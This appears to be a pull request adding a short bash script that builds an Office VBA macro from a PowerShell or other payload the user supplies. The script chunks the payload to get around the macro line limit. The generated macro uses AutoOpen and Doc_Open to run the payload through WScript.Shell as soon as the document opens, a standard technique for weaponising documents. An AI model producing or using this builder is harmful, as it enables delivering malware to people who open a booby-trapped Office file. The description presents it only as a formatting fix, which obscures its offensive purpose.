### PR TITLE
Simple Office macro builder bash script

### DIFF
--- a/office_macro_255_char_limit.sh
+++ b/office_macro_255_char_limit.sh
@@ -1,0 +1,26 @@
+#!/bin/bash
+echo "Enter your Powershell or other payload: "
+read payload
+
+cat <<eof
+
+Sub AutoOpen()
+        Logs
+End Sub
+
+Sub Doc_Open()
+        Logs
+End Sub
+
+Sub Logs()
+Dim Str As String
+eof
+
+echo -n $payload | fold -w 50 | sed -e 's/^/Str = Str + "/g' | sed -e 's/$/"/g'
+
+cat <<eof
+
+CreateObject("Wscript.Shell").Run Str
+
+End Sub
+eof


### PR DESCRIPTION
To fit the Office macro's 255 character limit on every line.